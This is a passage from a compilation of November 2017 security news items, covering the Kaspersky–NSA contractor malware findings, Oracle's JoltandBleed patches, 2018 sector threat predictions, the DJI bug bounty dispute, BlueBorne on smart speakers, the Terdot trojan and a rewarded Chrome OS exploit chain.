“What is interesting is that this ISO file is malicious and was mounted and subsequently installed on the system along with files such as “kms.exe” (a name of a popular pirated software activation tool), and “kms.activator.for.microsoft.windows.8.server.2012.and.office.2013.all.editions”. Kaspersky Lab products detected the malware with the verdict Backdoor.Win32.Mokes.hvl.” continues Kaspersky.

Kaspersky was able to detect and halt Mokes, but the user turned off the Russian software to execute the keygen.

Once the antivirus was turned on again, it detected the malware. Kaspersky added that over a two month its security software found 128 separate malware samples on the machine that weren’t related to the Equation Group.

Kaspersky found that the Mokes’ command and control servers were apparently being operated by a Chinese entity going by the name “Zhou Lou”, from Hunan, using the e-mail address “zhoulu823@gmail.com.”

Kaspersky explained that it’s also possible that the NSA contractor’s PC may have been infected with a sophisticated strain of malware developed by an APT that was not detected at the time.

“Given that system owner’s potential clearance level, the user could have been a prime target of nation states,” Kaspersky said. “Adding the user’s apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands.”

Further details are included in the technical report.

Oracle issues emergency patches for JOLTANDBLEED flaws
17.11.2017 securityaffairs

JoltandBleed – Oracle issued an emergency patch for vulnerabilities affecting several of its products that rely on the proprietary Jolt protocol.
Oracle issued an emergency patch for vulnerabilities affecting several of its products that rely on the proprietary Jolt protocol.

The vulnerabilities were reported by experts at ERPScan who named the set of five vulnerabilities JoltandBleed.

The most critical flaw was rated with the highest CVSS base score of 9.9 and even 10.0, according to the experts it may be exploited over a network without the need for a valid username and password.

The JoltandBleed issues affect the Jolt server within Oracle Tuxedo that is used by numerous Oracle’s products, including Oracle PeopleSoft. An attacker can exploit the vulnerabilities to gain full access to all data stored in the following ERP systems:

Oracle PeopleSoft Campus Solutions
Oracle PeopleSoft Human Capital Management
Oracle PeopleSoft Financial Management
Oracle PeopleSoft Supply Chain Management, etc.
Below the complete list of the JoltandBleed vulnerabilities discovered by the expert:

CVE-2017-10272 is a vulnerability of memory disclosure; its exploitation gives an attacker a chance to remotely read the memory of the server.
CVE-2017-10267 is a vulneralility of stack overflows.
CVE-2017-10278 is a vulneralility of heap overflows.
CVE-2017-10266 is a vulnerability that makes it possible for a malicious actor to bruteforce passwords of DomainPWD which is used for the Jolt Protocol authentication.
CVE-2017-10269 is a vulnerability affecting the Jolt Protocol; it enables an attacker to compromise the whole PeopleSoft system.
The flaw ties the way Jolt Handler (JSH) processes a command with opcode 0x32

“This error is originated with that how Jolt Handler processes a command with opcode 0x32. If the package structure is incorrect, a programmer has to provide a Jolt client with a certain Jolt response indicating there is an error in the communication process,” continues ERPScan.

Oracle made the patches available Tuesday for Oracle Fusion Middleware, which address all vulnerabilities.


The vulnerability was caused by a coding mistake in a function call that was responsible for packing data to transmit.

“The confusion was between 2 functions, jtohi and htoji. Consequently, packing of a constant package length that must be 0x40 bytes is actually 0x40000000,” said ERPScan.

“Then a client initiates the transmission of 0x40000000 bytes of data. Manipulating the communication with the client, an attacker can achieve a stable work of a server side and sensitive data leakage. Initiating a mass of connections, the hacker passively collects the internal memory of the Jolt server,”

The vulnerability causes the leakage of credentials when a user enters them through the web interface of PeopleSoft systems.

Technically, the flaw is a memory leakage vulnerability similar to HeartBleed so it can be used to retrieve a user password and other sensitive data.

“One of the possible attacks besides an obvious theft of employees data is for students to hack Campus Solutions and modify or delete payment orders for their education or gain financial aid. This attack as well as other details was demonstrated today at the DeepSec Security conference in Vienna.” said ErpScan.

Below the video PoC published by ErpScan:

According to Oracle the CVE-2017-10272 memory disclosure vulnerability is easy to exploit and allows a low privileged attacker with network access via Jolt to compromise Oracle Tuxedo.

“Vulnerability in the Oracle Tuxedo component of Oracle Fusion Middleware (subcomponent: Core). Supported versions that are affected are 11.1.1, 12.1.1, 12.1.3 and 12.2.2. Easily exploitable vulnerability allows low privileged attacker with network access via Jolt to compromise Oracle Tuxedo.” wrote Oracle. “While the vulnerability is in Oracle Tuxedo, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Tuxedo accessible data as well as unauthorized access to critical data or complete access to all Oracle Tuxedo accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Tuxedo.”

Threat Predictions for Automotive in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
Modern cars are no longer just electro-mechanical vehicles. With each generation, they become more connected and incorporate more intelligent technologies to make them smarter, more efficient, comfortable and safe. The connected-car market is growing at a five-year compound annual growth rate of 45% — 10 times faster than the car market overall.

In some regions (e.g. the EU or Russia) two-way connected systems (eCall, ERA-GLONASS) are extensively implemented for safety and monitoring purposes; and all major auto manufacturers now offer services that allow users to interact remotely with their car via a web interface or a mobile app.

Remote fault diagnostics, telematics and connected infotainment significantly enhance driver safety and enjoyment, but they also present new challenges for the automotive sector as they turn vehicles into prime targets for cyberattack. The growing risk of a vehicle’s systems being infiltrated or having its safety, privacy and financial elements violated, requires manufacturers to understand and apply IT security. Recent years have seen a number (here, here, and here) of examples highlighting the vulnerability of connected cars.

What can we expect in 2018?
Gartner estimates that there will be a quarter of a billion connected cars on the roads by 2020. Others suggest that by then around 98% of cars will be connected to the Internet. The threats we face now, and those we expect to face over the coming year should not be seen in isolation – they are part of this continuum – the more vehicles are connected, in more ways, the greater the surface and opportunities for attack.

The threats facing the automotive sector over the coming 12 months include the following:

Vulnerabilities introduced through lack of manufacturer attention or expertise, combined with competitive pressures. The range of connected mobility services being launched will continue to rise, as will the number of suppliers developing and delivering them. This ever-growing supply (and the likelihood of products/suppliers being of variable quality), coupled with a fiercely competitive marketplace could lead to security short cuts or gaps that provide an easy way in for attackers.
Vulnerabilities introduced through growing product and service complexity. Manufacturers serving the automotive sector are increasingly focused on delivering multiple interconnected services to customers. Every link is a potential point of weakness that attackers will be quick to seize on. An attacker only needs to find one insecure opening, whether that is peripheral such as a phone Bluetooth or a music download system, for example, and from there they may be able to take control of safety-critical electrical components like the brakes or engine, and wreak havoc.
No software code is 100% bug free – and where there are bugs there can be exploits. Vehicles already carry more than 100 million lines of code. This in in itself represents a massive attack surface for cybercriminals. And as more connected elements are installed into vehicles, the volume of code will soar, increasing the risk of bugs. Some automotive manufacturers, including Tesla have introduced specific bug bounty programs to address this.
Further, with software being written by different developers, installed by different suppliers, and often reporting back to different management platforms, no one player will have visibility of, let alone control over, all of a vehicle’s source code. This could make it easier for attackers to bypass detection.
Apps mean happiness for cybercriminals. There are a growing number of smartphone apps, many introduced by car manufacturers, which owners can download to remotely unlock their cars, check the engine status or find its location. Researchers have already demonstrated proof of concepts of how such apps can be compromised. It will not be long before Trojanized apps appear that inject malware direct into the heart of an unsuspecting victim’s vehicle.
With connected components increasingly introduced by companies more familiar with hardware than software, there is a growing risk that the need for constant updates could be overlooked. This could make it harder, if not impossible for known issues to be patched remotely. Vehicle recalls take time and cost money and in the meantime many drivers will be left exposed.
Connected vehicles will generate and process ever more data – about the vehicle, but also about journeys and even personal data on the occupants – this will be of growing appeal to attackers looking to sell the data on the black market or to use it for extortion and blackmail. Car manufacturers are already under pressure from marketing companies eager to get legitimate access to passenger and journey data for real time location-based advertising.
Fortunately, growing awareness and understanding of security threats will result in the first cyber secure devices for remote diagnostic and telematics data appearing on the marke
Further, lawmakers will come up with requirements and recommendations for making cybersecurity a mandatory part of all connected vehicles.
Last but not least, alongside existing safety certification there will be new organizations set up that are responsible for cybersecurity certification. They will use clearly defined standards to assess connected vehicles in terms of their resistance to cyberattacks.
Recommended action
Addressing these risks involves integrating security as standard, by design, focused on different parts of the connected car ecosystem. Defensive software solutions could be installed locally on individual electrical components— for instance, the brakes — to reinforce them against attacks. Next, software can protect the vehicle’s internal network as a whole by examining all network communications, flagging any changes in standard in-vehicle network behaviour and stopping attacks from advancing in the network. Overarching this, a solution needs to protect all components that are connected externally, to the Internet. Cloud security services can detect and correct threats before they reach the vehicle. They also can send the vehicle over-the-air updates and intelligence in real time. All of this should be supported with rigorous and consistent industry standards.

Threat Predictions for Connected Health in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
In 2017, Kaspersky Lab research revealed the extent to which medical information and patient data stored within the connected healthcare infrastructure is left unprotected and accessible online for any motivated cybercriminal to discover. For example, we found open access to around 1,500 devices used to process patient images. In addition, we found that a significant amount of connected medical software and web applications contains vulnerabilities for which published exploits exist.

This risk is heightened because cyber-villains increasingly understand the value of health information, its ready availability, and the willingness of medical facilities to pay to get it back.

What can we expect in 2018?
The threats to healthcare will increase as ever more connected devices and vulnerable web applications are deployed by healthcare facilities. Connected healthcare is driven by a number of factors, including a need for resource and cost efficiency; a growing requirement for remote, home-based care for chronic conditions like diabetes and ageing populations; consumer desire for a healthy lifestyle; and a recognition that data-sharing and patient monitoring between organizations can significantly enhance the quality and effectiveness of medical care.

The threats facing these trends over the coming 12 months include the following:

Attacks targeting medical equipment with the aim of extortion, malicious disruption or worse, will rise. The volume of specialist medical equipment connected to computer networks is increasing. Many such networks are private, but one external Internet connection can be enough for attackers to breach and spread their malware through the ‘closed’ network. Targeting equipment can disrupt care and prove fatal – so the likelihood of the medical facility paying up is very high.
There will also be a rise in the number of targeted attacks focused on stealing data. The amount of medical information and patient data held and processed by connected healthcare systems grows daily. Such data is immensely valuable on the black market and can also be used for blackmail and extortion. It’s not just other criminals who could be interested: the victim’s employer or insurance company might want to know as it could impact premiums or even job security.
There will be more incidents related to ransomware attacks against healthcare facilities. These will involve data encryption as well as device blocking: connected medical equipment is often expensive and sometimes life-critical, which makes them a prime target for attack and extortion.
The concept of a clearly-defined corporate perimeter will continue to ‘erode’ in medical institutions, as ever more workstations, servers, mobile devices and equipment go online. This will give criminals more opportunities to gain access to medical information and networks. Keeping defenses and endpoints secure will be a growing challenge for healthcare security teams as every new device will open up a new entry point into the corporate infrastructure.
Sensitive and confidential data transmitted between connected ‘wearables’, including implants, and healthcare professionals will be a growing target for attack as the use of such devices in medical diagnosis, treatment and preventative care continues to increase. Pacemakers and insulin pumps are prime examples.
National and regional healthcare information systems that share unencrypted or otherwise insecure patient data between local practitioners, hospitals, clinics and other facilities will be a growing target for attackers looking to intercept data beyond the protection of corporate firewalls. The same applies to data shared between medical facilities and health insurance companies.
The growing use by consumers of connected health and fitness gadgets will offer attackers access to a vast volume of personal data that is generally minimally protected. The popularity of health-conscious, connected lifestyles means that fitness bracelets, trackers, smart watches, etc. will carry and transmit ever larger quantities of personal data with only basic security – and cybercriminals won’t hesitate to exploit this.
Disruptive attacks – whether in the form of denial of service attacks or through ‘ransomware’ that simply destroys data (such as WannaCry) – are a growing threat to increasingly digital health care facilities. The ever increasing number of work stations, electronic records management and digital business processes that underpin any modern organization broadens the attack surface for cybercriminals. In healthcare, they take on an extra urgency, as any disruption can in real terms become a matter of life or death.
Last, but not least, emerging technologies such as connected artificial limbs, implants for smart physiological enhancements, embedded augmented reality etc. designed both to address disabilities and create better, stronger, fitter human beings – will offer innovative attackers new opportunities for malicious action and harm unless they have security integrated from the very first moment of design.

Threat Predictions for Financial Services and Fraud in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
In 2017 we’ve seen fraud attacks in financial services become increasingly account-centric. Customer data is a key enabler for large-scale fraud attacks and the frequency of data breaches among other successful attack types has provided cybercriminals with valuable sources of personal information to use in account takeover or false identity attacks. These account-centric attacks can result in many other losses, including that of further customer data and trust, so mitigation is as important as ever for businesses and financial services customers alike.

What can we expect in 2018?
2018 will be a year of innovation in financial services as the pace of change in this space continues to accelerate. As more channels and new financial service offerings emerge, threats will diversify. Financial services will need to focus on omni-channel fraud prevention to successfully identify more fraud crossing from online accounts to newer channels. Newer successful payment types will see more attack attempts as their profitability for attack increases.

Real-time payment challenges. Increasing demand from consumers for real-time and cross-border financial transactions results in pressure to analyse risk more quickly. Consumer expectations for friction-free payments make this task even more challenging. Financial services will need to rethink and make ‘Know Your Customer’ processes more effective. Machine learning and eventually AI-based solutions will also be key in meeting the need for quicker fraud and risk detection.
Social engineering attacks. Financial services will need to stay focused on tried and tested attack techniques. In spite of more sophisticated emergent threats, social engineering and phishing continue to be some of the simplest and most profitable attacks – exploiting the human element as the weakest link. Customer and employee education should continue to improve awareness of the latest attacks and scams.
Mobile threats. According to the latest Kaspersky Cybersecurity Index, ever more online activity now takes place on mobile. For example, 35 per cent of people now use their smartphone for online banking and 29 per cent for online payment systems (up from 22 per cent and 19 per cent respectively in the previous year). These mobile-first consumers will increasingly be prime targets for fraud. Cybercriminals will use previously-successful and new malware families to steal user banking credentials in creative ways. In 2017 we saw the modification of malware family Svpeng. In 2018, other families of mobile malware will re-surface to target banking credentials with new features. Identification and the removal of mobile malware is essential to financial services institutions to stop these attacks early.
Data breaches. Data breaches will continue to make the headlines in 2018 and the secondary impact on financial institutions will be felt through fake account set ups and account take-over attacks. Data breaches, although harder to commit than individual fraud attacks against customers, are hugely profitable to criminals thanks to the high volume of customer data exposed in one hit. Financial services should regularly test their defences and use solutions to detect any suspicious access at the earliest stages.
Cryptocurrency targets. More financial institutions will explore the application of cryptocurrencies, making attacks on these currencies a key target for cybercriminals. We already saw the occurrence of mining malware increasing in 2017 and more attempts to exploit these currencies will be seen in 2018. Solutions capable of detecting the latest malware families should be used as well as combining the latest threat intelligence into prevention strategies. [See Threat Predictions for Cryptocurrencies for further information on this threat.]
Account takeover. More secure physical payments through chip technology and other Point of Sale improvements, have shifted fraud online in the past decade. Now, as online payment security improves through tokenisation, biometric technology and more, fraudsters are shifting to account takeover attacks. Industry estimates suggest fraud of this type will run into billions of dollars as fraudsters pursue this highly profitable attack vector. Financial services will need to rethink digital identities and use innovative solutions to be sure that customers are who they say they are, every time.
Pressure to innovate. More and more businesses will venture into payment solutions and open banking offerings in 2018. Innovation will be key to incumbent financial service firms seeking a competitive advantage over an increasing number of competitors. But understanding the regulatory complications can be challenging enough, never mind evaluating the potential for attack on new channels. These new offerings will be targets for fraudsters upon release and any new solution not designed with security at the core will find itself an easy target for cybercriminals.
Fraud-as-a-Service. International underground communication amongst cybercriminals means that knowledge is shared quickly and attacks can spread globally even faster. Fraud services are offered on the dark web, from bots and phishing translation services to remote access tools. Less experienced cybercriminals purchase and use these tools, meaning more attempted attacks for financial services to block. Sharing knowledge across departments as well as looking to threat intelligence services will be key in mitigation.
ATM attacks. ATMs will continue to attract the attention of many cybercriminals. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malware, remote and fileless operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars with a step-by-step user guide. Kaspersky Lab has published a report on future ATM attack scenarios targeting ATM authentication systems.

Threat Predictions for Industrial Security in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
2017 was one of the most intense in terms of incidents affecting the information security of industrial systems. Security researchers discovered and reported hundreds of new vulnerabilities, warned of new threat vectors in ICS and technological processes, provided data on accidental infections of industrial systems and detected targeted attacks (for example, Shamoon 2.0/StoneDrill). And, for the first time since Stuxnet, discovered a malicious toolset some call a ‘cyber-weapon’ targeting physical systems: CrashOverride/Industroyer.

However, the most significant threat to industrial systems in 2017 was encryption ransomware attacks. According to a Kaspersky Lab ICS CERT report, in the first half of the year experts discovered encryption ransomware belonging to 33 different families. Numerous attacks were blocked, in 63 countries across the world. The WannaCry and ExPetr destructive ransomware attacks appear to have changed forever the attitude of industrial enterprises to the problem of protecting essential production systems.

What can we expect in 2018?
A rise in general and accidental malware infections. With few exceptions, cybercriminal groups have not yet discovered simple and reliable schemes for monetizing attacks on industrial information systems. Accidental infections and incidents in industrial networks caused by ‘normal’ (general) malicious code aimed at a more traditional cybercriminal target such as the corporate networks, will continue in 2018. At the same time, we are likely to see such situations result in more severe consequences for industrial environments. The problem of regularly updating software in industrial systems in line with the corporate network remains unresolved, despite repeated warnings from the security community.
Increased risk of targeted ransomware attacks. The WannaCry and ExPetr attacks taught both security experts and cybercriminals that operational technology (OT) systems are more vulnerable to attack than IT systems, and are often exposed to access through the Internet. Moreover, the damage caused by malware can exceed that in the corresponding corporate network, and ‘firefighting’ in the case of OT is much more difficult. Industrial companies have demonstrated how inefficient their organization and staff can be when it comes to cyberattacks on their OT infrastructure. All of these factors make industrial systems a desirable target for ransomware attacks.
More incidents of industrial cyberespionage. The growing threat of organized ransomware attacks against industrial companies could trigger development of another, related area of cybercrime: the theft of industrial information systems data to be used afterwards for the preparation and implementation of targeted (including ransomware) attacks.
New underground market activity focused on attack services and hacking tools. In recent years, we have seen growing demand on the black market for zero day exploits targeting ICS. This tells us that criminals are working on targeted attack campaigns. We expect to see this interest increase in 2018, stimulating the growth of the black markets and the appearance of new segments focused on ICS configuration data and ICS credentials stolen from industrial companies and, possibly, botnets with ‘industrial’ nodes offerings. Design and implementation of advanced cyberattacks targeting physical objects and systems requires an expert knowledge of ICS and relevant industries. Demand is expected to drive growth in areas such as ‘malware-as-a-service’, ‘attack-vector-design-as-a-service’, ‘attack-campaign-as-a-service’ and more.
New types of malware and malicious tools. We will probably see new malware being used to target industrial networks and assets, with features including stealth and the ability to remain inactive in the IT network to avoid detection, only activating in less secure OT infrastructure. Another possibility is the appearance of ransomware targeting lower-level ICS devices and physical assets (pumps, power switches, etc.).
Criminals will take advantage of ICS threat analyses published by security vendors. Researchers have done a good job finding and making public various attack vectors on industrial assets and infrastructures and analyzing the malicious toolsets found. However, this could also provide criminals with new opportunities. For example, the CrashOverride/Industroyer toolset disclosure could inspire hacktivists to run denial-of-service attacks on power and energy utilities; or criminals may targeted ransomware and may even invent monetizing schemes for blackouts. The PLC (programmable logic controller) worm concept could inspire criminals to create real world malicious worms; while others could try to implement malware using one of standard languages for programming PLCs. Criminals also could recreate the concept of infecting the PLC itself. Both these types of malware could remain undetected by existing security solutions.
Changes in national regulation. In 2018, a number of different cybersecurity regulations for industrial systems will need to be implemented. For example, those with critical infrastructures and industrial assets facilities will be compelled to do more security assessments. This will definitely increase protection and awareness. Thanks to that, we will probably see some new vulnerabilities found and threats disclosed.
Growing availability of, and investment in industrial cyber insurance. Industrial cyber-risk insurance is becoming an integral part of risk management for industrial enterprises. Previously, the risk of a cybersecurity incident was excluded from insurance contracts – just like the risk of a terrorist attack. But the situation is changing, with new initiatives introduced by both cybersecurity and insurance companies. In 2018, this will increase the number of audits/assessments and incident responses undertaken, raising cybersecurity awareness among the industrial facility’s leaders and operators.

Threat Predictions for Cryptocurrencies in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
Today, cryptocurrency is no longer only for computer geeks and IT pros. It’s starting to affect people’s daily life more than they realize. At the same time, it is fast becoming an attractive target for cybercriminals. Some cyberthreats have been inherited from e-payments, such as changing the address of the destination wallet address during transactions and stealing an electronic wallet, among other things. However, cryptocurrencies have opened up new and unprecedented ways to monetize malicious activity.

In 2017, the main global threat to users was ransomware: and in order to recover files and data encrypted by attackers, victims were required to pay a ransom in cryptocurrency. In the first eight months of 2017, Kaspersky Lab products protected 1.65 million users from malicious cryptocurrency miners, and by the end of the year we expect this number to exceed two million. In addition, in 2017, we saw the return of Bitcoin stealers after a few years in the shadows.

What can we expect in 2018?
With the ongoing rise in the number, adoption and market value of cryptocurrencies, they will not only remain an appealing target for cybercriminals, but will lead to the use of more advanced techniques and tools in order to create more. Cybercriminals will quickly turn their attention to the most profitable money-making schemes. Therefore, 2018 is likely to be the year of malicious web-miners.

Ransomware attacks will force users to buy cryptocurrency. Cybercriminals will continue to demand ransoms in cryptocurrency, because of the unregulated and almost anonymous cryptocurrency market: there is no need to share any data with anyone, no one will block the address, no one will catch you, and there is little chance of being tracked. At the same time, further simplification of the monetization process will lead to the wider dissemination of encryptors.
Targeted attacks with miners. We expect the development of targeted attacks on companies for the purpose of installing miners. While ransomware provides a potentially large but one-off income, miners will result in lower but longer Next year we will see what tips the scales.
Rise of miners will continue and involve new actors. Next year mining will continue to spread across the globe, attracting more people. The involvement of new miners will depend on their ability to get access to a free and stable source of electricity. Thus, we will see the rise of ‘insider miners’: more employees of government organizations will start mining on publicly owned computers, and more employees of manufacturing companies will start using company-owned facilities.
Web-mining. Web-mining is a cryptocurrency mining technique used directly in browser with a special script installed on a web-page. Attackers have already proved it is easy to upload such a script to a compromised website and engage visitors’ computers in mining and, as a result add more coins to the criminals’ wallets. Next year web-mining will dramatically affect the nature of the Internet, leading to new ways of website monetization. One of these will replace advertising: websites will offer to permanently remove a mining script if the user subscribes to paid content. Alternatively, different kinds of entertainment, such as movies, will be offered for free in exchange for your mining. Another method is based on a website security check system – Captcha verification to distinguish humans from bots will be replaced with web mining modes, and it will be no longer matter whether a visitor is bot or human since they will ‘pay’ with mining.
Fall of ICO (Initial Coin Offering). ICO means crowdfunding via cryptocurrencies. 2017 saw tremendous growth of this approach; with more than $3 billion collected by different projects, most related in some way to blockchain. Next year we should expect ICO-hysteria to decline, with a series of failures (inability to create the ICO-funded product), and more careful selection of investment projects. A number of unsuccessful ICO projects may negatively affect the exchange rate of cryptocurrencies (Bitcoin, Ethereum etc.), which in 2017 experienced unprecedented growth. Thus we will see a decrease in the absolute number of phishing and hacking attacks targeting ICO, smart contracts and wallets.

Drone Maker DJI, Researcher Quarrel Over Bug Bounty Program
17.11.2017 securityweek 
China-based Da-Jiang Innovations (DJI), one of the world’s largest drone makers, has accused a researcher of accessing sensitive information without authorization after the expert bashed the company’s bug bounty program.

DJI announced the launch of a bug bounty program in late August and offered between $100 and $30,000 for vulnerabilities that allow the creation of backdoors, and ones that expose sensitive customer information, source code or encryption keys.

Bug bounty hunters started analyzing the company’s systems for vulnerabilities, but didn’t know exactly where to look for them as DJI had failed to clarify exactly which of its assets were in scope.

Kevin Finisterre, a security researcher who specializes in drones, discovered that DJI had inadvertently made public SSL and firmware AES keys in source code published on GitHub. He also found keys for AWS buckets storing flight logs and customer identity documents, including passports, driver’s licenses, and state identification.DJI fights with researcher over bug bounty program

Finisterre said others had found unprotected AWS buckets storing, among other things, personal data and images of damaged drones submitted by customers.

“There were serious ramifications to the things that were found on the DJI AWS servers,” the researcher said. “One of the first things I did to judge the impact of the exposure was grep for ‘.mil’ and ‘.gov’, ‘gov.au’. Immediately flight logs for a number of potentially sensitive locations came out. It should be noted that newer logs, and PII seemed to be encrypted with a static OpenSSL password, so theoretically some of the data was at least loosely protected from prying eyes. Unfortunately the rest of the server side security renders this point moot.”

DJI fights with researcher over bug bounty program

After reporting his findings to DJI via its bug bounty program, Finisterre was informed that he qualified for the maximum reward, $30,000. However, the company told him that in order to receive the bug bounty, he would have to sign an agreement.

“I won’t go into too much detail, but the agreement that was put in front of me by DJI in essence did not offer researchers any sort of protection,” Finisterre said. “For me personally the wording put my right to work at risk, and posed a direct conflicts of interest to many things including my freedom of speech. It almost seemed like a joke. It was pretty clear the entire ‘Bug Bounty’ program was rushed based on this alone.”

While the researcher was trying to negotiate the non-disclosure agreement (NDA) via a DJI representative in the United States, the drone manufacturer’s legal department in China sent him a notice that he may be facing charges under the controversial Computer Fraud and Abuse Act (CFAA).

After consulting with lawyers who told him that DJI’s agreement was “extremely risky” and “likely crafted in bad faith to silence anyone that signed it,” the researcher decided to walk away from the bug bounty. He also decided to make his findings public, including some of the communications with DJI representatives during this process.

In response, DJI published a statement saying that it’s investigating Finisterre’s unauthorized access to its servers, and accused the researcher of publishing confidential communications with DJI employees.

“DJI implemented its Security Response Center to encourage independent security researchers to responsibly report potential vulnerabilities,” the company said in a statement. “DJI asks researchers to follow standard terms for bug bounty programs, which are designed to protect confidential data and allow time for analysis and resolution of a vulnerability before it is publicly disclosed. The hacker in question refused to agree to these terms, despite DJI’s continued attempts to negotiate with him, and threatened DJI if his terms were not met.”

The infosec community is split on this issue – some have taken Finisterre’s side pointing to DJI’s failure to specify exactly what its bug bounty covered and what researchers were allowed to do. Others, however, have sided with DJI, noting that the bounty hunter shouldn’t have accessed the data and that the agreement was reasonable.

Following Finisterre’s disclosure, DJI provided more information on its bug bounty program, including scope and requirements for disclosing flaws.

“DJI understands the importance of public disclosure of unknown or novel security flaws to build a common base of knowledge within the security community and to build a safer internet,” the company said. “DJI is committed to disclosing such information to the fullest extent possible. However, DJI in its sole discretion will decide when and how, and to what extent of details, to disclose to the public the bugs/vulnerabilities reported by you.”

DJI says it has paid out “thousands of dollars” to nearly a dozen researchers since the launch of its bug bounty program.

20 Million Google Home and Amazon Echo devices are affected by the Blueborne flaws
17.11.2017 securityaffairs

Millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, are affected by the Blueborne flaws.
A series of recently disclosed critical Bluetooth flaws that affect billions of Android, iOS, Windows and Linux devices have now been discovered in
Millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, are affected by the recently discovered Blueborne vulnerabilities.
The recently discovered BlueBorne attack technique was devised by experts with Armis Labs. Researchers discovered a total of eight vulnerabilities in the Bluetooth design that expose devices to cyber attacks.
Billions of mobile, desktop and IoT devices that use Bluetooth may be exposed to a new remote attack, even without any user interaction and pairing. The unique condition for BlueBorne attacks is that targeted devices must have Bluetooth enabled.
blueborne attack
Once an attacker compromises a Bluetooth-enabled device, he can infect any other device on the same network.

The IoT security firm Armis now reported that an estimated 15 million Amazon Echo and 5 million Google Home devices are vulnerable to BlueBorne attack.

“Following the disclosure of the BlueBorne attack vector this past September, Armis discovered that critical Bluetooth vulnerabilities impact the Amazon Echo and Google Home. These new IoT voice-activated Personal Assistants join the extensive list of affected devices.” reads the blog post published by Armis.

“Personal Assistants are rapidly expanding throughout the home and workplace, with an estimated 15 million Amazon Echo and 5 million Google Home devices sold. Since these devices are unmanaged and closed sourced, users are unaware of the fact their Bluetooth implementation is based on potentially vulnerable code borrowed from Linux and Android.”

The Amazon Echo devices are affected by the following two vulnerabilities:
Remote code execution vulnerability in the Linux Kernel (CVE-2017-1000251)
Information leak vulnerability in the SDP Server (CVE-2017-1000250)
The researchers highlighted that other Echo devices running Linux or Android operating systems are affected by other Blueborne vulnerabilities.

Google Home devices are affected only by the CVE-2017-0785 vulnerability that is an information disclosure flaw in Android’s Bluetooth stack.

The voice-activated personal assistants are constantly listening to Bluetooth communications, an attacker within the range of the vulnerable IoT device can easily hack them.

“These devices are constantly listening to Bluetooth communications. There is no way to put an agent/antivirus on these devices. And given their limited UI, there is no way to turn their Bluetooth off” continues the blog post.

Experts from Armis published a video proof-of-concept (PoC) to show how to hack an Amazon Echo device.

Armis reported the issues to both Amazon and Google that have released patches and issued automatic updates for the affected problems.

Amazon Echo users can check that their devices are using a version that is newer than v591448720.

“The Amazon Echo and Google Home are the better examples as they were patched, and did not need user interaction to update. However, the vast bulk of IoT devices cannot be updated. However, even the Echos and the Homes will eventually be replaced by new hardware versions (as Amazon and Google recently announced), and eventually the old generations will not receive updates – potentially leaving them susceptible to attacks indefinitely.” concluded Armis.

Terdot Banking Trojan is back and it now implements espionage capabilities
17.11.2017 securityaffairs

The Terdot banking Trojan isn’t a novelty in the threat landscape, it has been around since mid-2016, and now it is reappearing on the scenes.
According to Bitdefender experts, vxers have improved the threat across the years, implementing credential harvesting features as well as social media account monitoring functionality.

The Terdot banking Trojan is based on the Zeus code that was leaked back in 2011, the authors have added a number of improvements, such as leveraging open-source tools for spoofing SSL certificates and using a proxy to filter web traffic in search of sensitive information.

“Terdot is a complex malware. Its modular structure, complex injections, and careful use of threads make it resilient, while its spyware and remote execution abilities make it extremely intrusive.” states the report published by BitDefender.

The ability of the Trojan in powering man-in-the-middle attacks could be exploited also to manipulate traffic on most social media and email platforms.

The Terdot banking Trojan implements sophisticated hooking and interception techniques, experts highlighted its evasion capabilities.

The banking Trojan is distributed mainly through compromised websites hosting the SunDown Exploit Kit. The Bitdefender researchers observed crooks spreading it through spam emails with a bogus PDF icon button which, if selected, executes JavaScript code that drop the malware on the victim’s machine.

Terdot banking Trojan

Once installed on the victim’s machine, the Terdot banking Trojan downloads updates and commands from the C&C server, the URL it the same it sends system information to. The Trojan also used a Domain Generation Algorithm (DGA).

“Terdot goes above and beyond the capabilities of a banker Trojan. Its focus on harvesting credentials for other services such as social networks and email service providers could turn it into an extremely powerful cyber-espionage tool that is extremely difficult to spot and clean,” Bitdefender concludes.

Google Discloses Details of $100,000 Chrome OS Flaws
17.11.2017 securityweek

Google has made public the details of a code execution exploit chain for Chrome OS that has earned a researcher $100,000.

In March 2015, Google announced its intention to offer up to $100,000 for an exploit chain that would lead to a persistent compromise of a Chromebox or Chromebook in guest mode via a web page. Prior to that, the company had offered $50,000 for such an exploit.

A researcher who uses the online moniker Gzob Qq informed Google on September 18 that he had identified a series of vulnerabilities that could lead to persistent code execution on Chrome OS, the operating system running on Chromebox and Chromebook devices.

The exploit chain includes an out-of-bounds memory access flaw in the V8 JavaScript engine (CVE-2017-15401), a privilege escalation in PageState (CVE-2017-15402), a command injection flaw in the network_diag component (CVE-2017-15403), and symlink traversal issues in crash_reporter (CVE-2017-15404) and cryptohomed (CVE-2017-15405).

Gzob Qq provided Google a proof-of-concept (PoC) exploit tested with Chrome 60 and Chrome OS platform version 9592.94.0. Google patched the vulnerabilities on October 27 with the release of Chrome OS 62 platform version 9901.54.0/1, which also addressed the recently disclosed KRACK vulnerabilities.

Google informed the researcher on October 11 that he had earned the $100,000 Pwnium reward. Pwnium was a single-day hacking competition that Google held every year alongside the CanSecWest conference until February 2015, when it decided to turn Pwnium into a year-round program.

Gzob Qq’s initial report, which describes the entire exploit chain, was made public by Google earlier this week, along with the advisories for each of the vulnerabilities it leverages.

This is not the first time the researcher has earned a $100,000 reward from Google. Roughly one year prior, he reported a similar Chrome OS exploit chain for which he received the same amount.

Back in 2014, at the Pwnium competition, researcher George Hotz earned $150,000 for a persistent Chrome OS exploit.

China May Delay Vulnerability Disclosures For Use in Attacks
17.11.2017 securityweek
